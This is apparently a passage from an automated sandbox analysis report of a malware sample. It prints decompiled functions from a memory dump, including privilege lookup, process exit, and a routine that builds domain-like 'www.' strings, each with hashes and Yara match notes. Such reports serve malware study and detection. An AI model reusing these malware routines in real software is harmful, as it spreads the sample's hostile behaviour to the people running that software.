                                                      • Instruction Fuzzy Hash: 8401B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A7B4, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041A7B4(void* __eax, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t12;
				void* _t18;

				 *[es:esi+0x4cc6264c] = __eax + 0x30;
				_t9 = _a4;
				E0041AF50(_t18, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t9 + 0xa18)), 0, 0x46);
				_t12 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t12;
			}





                                                      0x0041a7b6
                                                      0x0041a7c3
                                                      0x0041a7da
                                                      0x0041a7f0
                                                      0x0041a7f4

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: 86d82dd784740b8e7b613ffd7d5d3b00f0530098571226114730a42b569c0efb
                                                      • Instruction ID: ba7bcfdcc957d74909786c420522419ec44417000dba6f34f9db37019e781356
                                                      • Opcode Fuzzy Hash: 86d82dd784740b8e7b613ffd7d5d3b00f0530098571226114730a42b569c0efb
                                                      • Instruction Fuzzy Hash: 45E092B12002046FD720DF55CC80EE737A9DF88250F008259FA4D97342C531E816CBB5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A660, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041A660(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF50(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                      0x0041a66f
                                                      0x0041a677
                                                      0x0041a68d
                                                      0x0041a691

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A7C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041A7C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AF50(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                      0x0041a7da
                                                      0x0041a7f0
                                                      0x0041a7f4

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A6A0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041A6A0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AF50(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                      0x0041a6a3
                                                      0x0041a6ba
                                                      0x0041a6c8

                                                      APIs
                                                      • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6C8
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A692, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E0041A692(int _a4) {
				intOrPtr _v0;
				void* _t8;
				void* _t12;
				void* _t16;

				_push(0xffffff8c);
				 *((intOrPtr*)(_t12 + 0x55092926)) =  *((intOrPtr*)(_t12 + 0x55092926)) + _t8;
				_t9 = _v0;
				E0041AF50(_t16, _v0, _v0 + 0xc7c,  *((intOrPtr*)(_t9 + 0xa14)), 0, 0x36);
				ExitProcess(_a4);
			}







                                                      0x0041a692
                                                      0x0041a69b
                                                      0x0041a6a3
                                                      0x0041a6ba
                                                      0x0041a6c8

                                                      APIs
                                                      • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6C8
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: 8de1e32c41329fa599aca3dea56b8512d4af722e028c5df5aab392fcc190cf29
                                                      • Instruction ID: cbc4ec9e06b8b8bcc763557ce8c73eda63a4980423a482da4f1f118250f0d9a4
                                                      • Opcode Fuzzy Hash: 8de1e32c41329fa599aca3dea56b8512d4af722e028c5df5aab392fcc190cf29
                                                      • Instruction Fuzzy Hash: C3E08671605302BFC724DFA8CC85EC77B68DF09360F0542A9BD685B6D6C670A600C7A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 00417DBA, Relevance: 4.1, Strings: 3, Instructions: 329COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E00417DBA(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, char _a4) {
				signed char _v5;
				short _v7;
				char _v8;
				char _v12;
				signed char _v13;
				short _v15;
				intOrPtr _v19;
				char _v20;
				signed int* _v24;
				signed int _v28;
				char _v91;
				char _v92;
				char _v155;
				signed char _v156;
				char _v260;
				char _v778;
				char _v780;
				void* __edi;
				signed int __esi;
				void* __ebp;
				signed int _t135;
				void* _t146;

				if(__ecx - 1 >= 0) {
					asm("rcr ecx, 1");
					_t146 = __eax - 0x9c;
					 *0xbb781313 = __eax;
					asm("std");
					do {
						asm("sti");
					} while (_t146 > 0);
					asm("in eax, 0x69");
					asm("pushfd");
					do {
						asm("sbb al, 0x60");
						_pop(ds);
					} while (_t146 >= 0);
					asm("out dx, al");
					asm("aas");
					 *(__ebx + 0x6a) =  *(__ebx + 0x6a) & _t135;
					return 0xca;
				} else {
					asm("wait");
					 *((char*)(__edx - 0x7e1374ab)) = __ch;
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x308;
					asm("in al, dx");
					 *__ebx =  *__ebx | __al;
					 *__eax =  *__eax + __al;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__eax =  &_v91;
					_v92 = 0;
					E0041BE50( &_v91, 0, 0x3f) = 0;
					_v20 = 0;
					_v19 = 0;
					_v15 = __ax;
					_v13 = __al;
					__esi = 0;
					__eflags = 0;
					do {
						__eax = E0040A470(__eflags, 0x4e, 0x8d);
						__ecx = 0;
						__eflags = 0;
						while(1) {
							__eflags = __al -  *((intOrPtr*)(__ebp + __ecx - 0x10));
							if(__al ==  *((intOrPtr*)(__ebp + __ecx - 0x10))) {
								goto L14;
							}
							__ecx = __ecx + 1;
							__eflags = __ecx - __esi;
							if(__ecx <= __esi) {
								continue;
							} else {
								__eflags = __al;
								if(__al != 0) {
									 *(__ebp + __esi - 0x10) = __al;
									__esi = __esi + 1;
									__eflags = __esi;
								}
							}
							goto L14;
						}
						L14:
						__eflags = __esi - 8;
					} while (__eflags < 0);
					__eax = 0;
					__ecx =  &_v155;
					_v12 = 0x2e777777;
					_v8 = 0;
					_v7 = __ax;
					_v5 = __al;
					_v156 = __al;
					E0041BE50( &_v155, 0, 0x3f) = E0040A470(__eflags, 2, 5);
					__edx = __al & 0x000000ff;
					_push(__al & 0x000000ff);
					__eax =  &_v156;
					_push( &_v156);
					__eax = E0041C700();
					__ecx =  &_v156;
					 *((char*)(__ebp + E0041C0A0( &_v156) - 0x98)) = 0x3d;
					__eax = E0040A470(__eflags, 4, 0x10);
					__edx = __al & 0x000000ff;
					_push(__al & 0x000000ff);
					__eax =  &_v156;
					__eax = E0041C0A0( &_v156);
					__ecx = __ebp + __eax - 0x98;
					_push(__ebp + __eax - 0x98);
					__eax = E0041C700();
					_t27 =  &_a4; // 0x2e777777
					__esi =  *_t27;
					__ebx = 0;
					__esp = __esp + 8;
					_v24 = 0;
					__edi = 0;
					do {
						__eflags =  *((intOrPtr*)(__esi + 0x1170)) - __ebx;
						if( *((intOrPtr*)(__esi + 0x1170)) != __ebx) {
							__edx =  &_v92;
							E0041BE00( &_v92, 0x2e) = 0;
							__ecx =  &_v778;
							_v780 = __ax;
							__eax = E0041BE50( &_v778, 0, 0x206);
							 *(__esi + 0x14ac) =  *(__esi + 0x14ac) + __edi;
							__eax = E0041BE00( *(__esi + 0x14ac) + __edi, 0x388);
							__eax = E0041C3C0();
							__edx =  *(__esi + 0x14ac);
							_t35 = __ebx - 1; // -1
							__ecx = _t35;
							__eax = __eax * _t35;
							 *( *(__esi + 0x14ac) + __edi + 0x40) = __eax;
							 &_v156 = E0041C0A0( &_v156);
							__edx =  *(__esi + 0x14ac);
							__ecx =  &_v156;
							 *(__esi + 0x14ac) + __edi + 0x87 = E0041BDD0( *(__esi + 0x14ac) + __edi + 0x87,  &_v156,  *(__esi + 0x14ac) + __edi + 0x87);
							_t43 =  &_v12; // 0x2e777777
							__ecx = _t43;
							__edx =  &_v92;
							E0041BDD0( &_v92, _t43, 4) =  *(__ebp + __ebx - 0x10) & 0x000000ff;
							_push(4);
							__ecx =  &_v92;
							__edx = __ebp + E0041C0A0( &_v92) - 0x58;
							E0040AFA0(__ebx, __esi, __eflags, __esi, __ebp + E0041C0A0( &_v92) - 0x58,  *(__ebp + __ebx - 0x10) & 0x000000ff) =  &_v92;
							__eax = E0041C0A0( &_v92);
							__edx =  *(__esi + 0x14ac);
							__ecx =  &_v92;
							__edx =  *(__esi + 0x14ac) + __edi;
							__eax =  &_v92;
							__eax = E0041C0A0( &_v92);
							__ebx = __esi + 0xe90;
							__ecx =  &_v92;
							_v28 = __eax;
							__eax = E0041C1D0( &_v92, __ebx, 0);
							__edx =  &_v260;
							E00409E10( &_v260) =  &_v92;
							__eax = E0041C0A0( &_v92);
							__ecx =  &_v92;
							__edx =  &_v260;
							 &_v260 = E0040AB30( &_v260);
							__edx =  *(__esi + 0x14ac);
							__ecx =  &_v260;
							 *(__esi + 0x14ac) + __edi + 0x72 = E0041BDD0( *(__esi + 0x14ac) + __edi + 0x72,  &_v260, 0x14);
							__ecx = _v28;
							__edx =  *(__esi + 0x14ac);
							 *((char*)(__ebp + _v28 - 0x58)) = 0;
							__ecx =  &_v780;
							 *((intOrPtr*)( *(__esi + 0x14ac) + __edi + 0x4c)) = 2;
							__eax =  *(__esi + 0x14ac);
							 *((intOrPtr*)( *(__esi + 0x14ac) + __edi + 0x50)) = 1;
							E0040B030(__ebx, __esi, __eflags, __esi,  &_v780, 0x41, 1) =  *(__esi + 0x14ac);
							__edx =  &_v780;
							__ecx =  *(__esi + 0x14ac) + __edi + 0xc7;
							__eax = E0041C470( *(__esi + 0x14ac) + __edi + 0xc7,  &_v780);
							__edx =  &_v780;
							__eax = E0040B030(__ebx, __esi, __eflags, __esi,  &_v780, 0x42, 1);
							__ecx =  *(__esi + 0x14ac);
							__eax =  &_v780;
							__edx =  *(__esi + 0x14ac) + __edi + 0xc7;
							__eax = E0041C0A0( *(__esi + 0x14ac) + __edi + 0xc7);
							__eax = E0041C470(__eax,  &_v780);
							__edx =  *(__esi + 0x14ac);
							__ecx =  &_v92;
							 *(__esi + 0x14ac) + __edi + 0xc7 = E0041C1D0( *(__esi + 0x14ac) + __edi + 0xc7,  &_v92, 0);
							__ecx =  &_v780;
							E0040B030(__ebx, __esi, __eflags, __esi,  &_v780, 0x45, 1) =  *(__esi + 0x14ac);
							__edx =  &_v780;
							__ecx =  *(__esi + 0x14ac) + __edi + 0x167;
							__eax = E0041C470( *(__esi + 0x14ac) + __edi + 0x167,  &_v780);
							__edx =  &_v780;
							__eax = E0040B030(__ebx, __esi, __eflags, __esi,  &_v780, 0x46, 1);
							__ecx =  *(__esi + 0x14ac);
							__eax =  &_v780;
							__edx =  *(__esi + 0x14ac) + __edi + 0x167;
							__eax = E0041C0A0( *(__esi + 0x14ac) + __edi + 0x167);
							__eax = E0041C470(__eax,  &_v780);
							__edx =  *(__esi + 0x14ac);
							__ecx =  &_v92;
							 *(__esi + 0x14ac) + __edi + 0x167 = E0041C1D0( *(__esi + 0x14ac) + __edi + 0x167,  &_v92, 0);
							__ecx =  &_v780;
							E0040B030(__ebx, __esi, __eflags, __esi,  &_v780, 0x4a, 1) =  *(__esi + 0x14ac);
							__edx =  &_v780;
							__ecx =  *(__esi + 0x14ac) + __edi + 0x287;
							__eax = E0041C0A0( *(__esi + 0x14ac) + __edi + 0x287);
							__eax = __eax +  *(__esi + 0x14ac);
							__eflags = __eax;
							__edx = __eax + __edi + 0x287;
							__eax = E0041C470(__eax + __edi + 0x287,  &_v780);
							__ecx =  *(__esi + 0x14ac);
							__eax =  &_v92;
							__edx =  *(__esi + 0x14ac) + __edi + 0x287;
							E0041C1D0( *(__esi + 0x14ac) + __edi + 0x287,  &_v92, 0) =  *(__esi + 0x14ac);
							__ecx =  *(__esi + 0x14ac) + __edi + 0x287;
							__eax = E0041C1D0( *(__esi + 0x14ac) + __edi + 0x287, __ebx, 0);
							__ebx = _v24;
						}
						__ebx =  &(__ebx[0]);
						__edi = __edi + 0x388;
						_v24 = __ebx;
						__eflags = __edi - 0x1c40;
					} while (__edi < 0x1c40);
					_pop(__edi);
					_pop(__esi);
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return __eax;
				}
			}

























                                                      0x00417dbb
                                                      0x00417d89
                                                      0x00417d8b
                                                      0x00417d8d
                                                      0x00417d98
                                                      0x00417d99
                                                      0x00417d99
                                                      0x00417d99
                                                      0x00417d9f
                                                      0x00417da1
                                                      0x00417da2
                                                      0x00417da2
                                                      0x00417da4
                                                      0x00417da4
                                                      0x00417da9
                                                      0x00417daa
                                                      0x00417dab
                                                      0x00417db9
                                                      0x00417dbd
                                                      0x00417dbd
                                                      0x00417dbe
                                                      0x00417dc0
                                                      0x00417dc1
                                                      0x00417dc3
                                                      0x00417dc4
                                                      0x00417dc5
                                                      0x00417dc7
                                                      0x00417dc9
                                                      0x00417dca
                                                      0x00417dcb
                                                      0x00417dce
                                                      0x00417dd4
                                                      0x00417ddd
                                                      0x00417de2
                                                      0x00417de6
                                                      0x00417de9
                                                      0x00417ded
                                                      0x00417df0
                                                      0x00417df0
                                                      0x00417df2
                                                      0x00417df9
                                                      0x00417e01
                                                      0x00417e01
                                                      0x00417e03
                                                      0x00417e03
                                                      0x00417e07
                                                      0x00000000
                                                      0x00000000
                                                      0x00417e09
                                                      0x00417e0a
                                                      0x00417e0c
                                                      0x00000000
                                                      0x00417e0e
                                                      0x00417e0e
                                                      0x00417e10
                                                      0x00417e12
                                                      0x00417e16
                                                      0x00417e16
                                                      0x00417e16
                                                      0x00417e10
                                                      0x00000000
                                                      0x00417e0c
                                                      0x00417e17
                                                      0x00417e17
                                                      0x00417e17
                                                      0x00417e1c
                                                      0x00417e21
                                                      0x00417e28
                                                      0x00417e2f
                                                      0x00417e33
                                                      0x00417e37
                                                      0x00417e3a
                                                      0x00417e49
                                                      0x00417e4e
                                                      0x00417e51
                                                      0x00417e52
                                                      0x00417e58
                                                      0x00417e59
                                                      0x00417e5e
                                                      0x00417e6e
                                                      0x00417e76
                                                      0x00417e7b
                                                      0x00417e81
                                                      0x00417e82
                                                      0x00417e89
                                                      0x00417e8e
                                                      0x00417e98
                                                      0x00417e99
                                                      0x00417e9e
                                                      0x00417e9e
                                                      0x00417ea1
                                                      0x00417ea3
                                                      0x00417ea6
                                                      0x00417ea9
                                                      0x00417eb0
                                                      0x00417eb0
                                                      0x00417eb6
                                                      0x00417ebc
                                                      0x00417ec7
                                                      0x00417ecf
                                                      0x00417ed6
                                                      0x00417edd
                                                      0x00417ee8
                                                      0x00417ef0
                                                      0x00417ef5
                                                      0x00417efa
                                                      0x00417f00
                                                      0x00417f00
                                                      0x00417f03
                                                      0x00417f09
                                                      0x00417f14
                                                      0x00417f19
                                                      0x00417f20
                                                      0x00417f2f
                                                      0x00417f36
                                                      0x00417f36
                                                      0x00417f3a
                                                      0x00417f43
                                                      0x00417f4b
                                                      0x00417f4e
                                                      0x00417f5a
                                                      0x00417f65
                                                      0x00417f69
                                                      0x00417f6e
                                                      0x00417f75
                                                      0x00417f79
                                                      0x00417f81
                                                      0x00417f85
                                                      0x00417f8c
                                                      0x00417f92
                                                      0x00417f97
                                                      0x00417f9a
                                                      0x00417f9f
                                                      0x00417fab
                                                      0x00417faf
                                                      0x00417fb5
                                                      0x00417fb9
                                                      0x00417fcf
                                                      0x00417fd4
                                                      0x00417fdc
                                                      0x00417fe8
                                                      0x00417fed
                                                      0x00417ff0
                                                      0x00417ff6
                                                      0x00417fff
                                                      0x00418005
                                                      0x0041800d
                                                      0x00418015
                                                      0x00418022
                                                      0x00418028
                                                      0x0041802f
                                                      0x00418037
                                                      0x00418040
                                                      0x00418048
                                                      0x0041804d
                                                      0x00418056
                                                      0x0041805d
                                                      0x00418065
                                                      0x0041807b
                                                      0x00418080
                                                      0x00418088
                                                      0x00418094
                                                      0x0041809d
                                                      0x004180aa
                                                      0x004180b0
                                                      0x004180b7
                                                      0x004180bf
                                                      0x004180c8
                                                      0x004180d0
                                                      0x004180d5
                                                      0x004180de
                                                      0x004180e5
                                                      0x004180ed
                                                      0x00418103
                                                      0x00418108
                                                      0x00418110
                                                      0x0041811c
                                                      0x00418125
                                                      0x00418132
                                                      0x0041813b
                                                      0x00418142
                                                      0x0041814a
                                                      0x0041814f
                                                      0x0041814f
                                                      0x00418158
                                                      0x00418160
                                                      0x00418165
                                                      0x0041816d
                                                      0x00418171
                                                      0x0041817e
                                                      0x00418186
                                                      0x0041818f
                                                      0x00418194
                                                      0x00418197
                                                      0x0041819a
                                                      0x0041819b
                                                      0x004181a1
                                                      0x004181a4
                                                      0x004181a4
                                                      0x004181b0
                                                      0x004181b1
                                                      0x004181b2
                                                      0x004181b3
                                                      0x004181b5
                                                      0x004181b6
                                                      0x004181b6

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: =$www.$www.
                                                      • API String ID: 0-3343787489
                                                      • Opcode ID: f8ba1af60e937ab4c8cf884ff964e0fa76c8323343ee93bc1490613d4e08e115
                                                      • Instruction ID: 6992296f9757129a36ba5ce9c80e84d54c82ea405ba25dcce8443fd3e2421ea1
                                                      • Opcode Fuzzy Hash: f8ba1af60e937ab4c8cf884ff964e0fa76c8323343ee93bc1490613d4e08e115
                                                      • Instruction Fuzzy Hash: F5C1F8B5944308AADB14DBF0CCC2FDB777DAF44708F40455EB2495B182DA78A688CBA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A826F8, Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                      • Instruction ID: bafef5bdfe8207e1bf49f89c5d6fa6a675774b7b7e9eb6f378e839c1bc45c2fd
                                                      • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                      • Instruction Fuzzy Hash: E5F0C271724159DBDB48FB2A9D51B7A73E9EB94300F58C039EE89C7241E631DD408390
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00417D85, Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b2c0b4a6538dd4a74b670ecc5bea95e529d57a21cc6b3157f02f750674583925
                                                      • Instruction ID: 7c4a908927736e326dc9f4ce60e178c70644dacc10e051436c516727ad9688b9
                                                      • Opcode Fuzzy Hash: b2c0b4a6538dd4a74b670ecc5bea95e529d57a21cc6b3157f02f750674583925
                                                      • Instruction Fuzzy Hash: BFE0267AA2C005468A105E16B8400B1BB70E1E622371461E7D99493601D111C08183DC
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407B1A, Relevance: .0, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4797a5e9ed2b32bbf96215d13cccc18b60bfa7969a68ef8357863693318fc2c1
                                                      • Instruction ID: ddab29216c7834f4f8eff72f9b32487895ac840fa337fdd8e013318627988d8c
                                                      • Opcode Fuzzy Hash: 4797a5e9ed2b32bbf96215d13cccc18b60bfa7969a68ef8357863693318fc2c1
                                                      • Instruction Fuzzy Hash: 44D0C73291550556D2244D6CA4411E5F7A49773134F14675BDCA4A75C15542E4438585
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6F8CC, Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                      • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                      • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                      • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A710D0, Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                      • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                      • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                      • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A70060, Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                      • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                      • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                      • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A701D4, Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
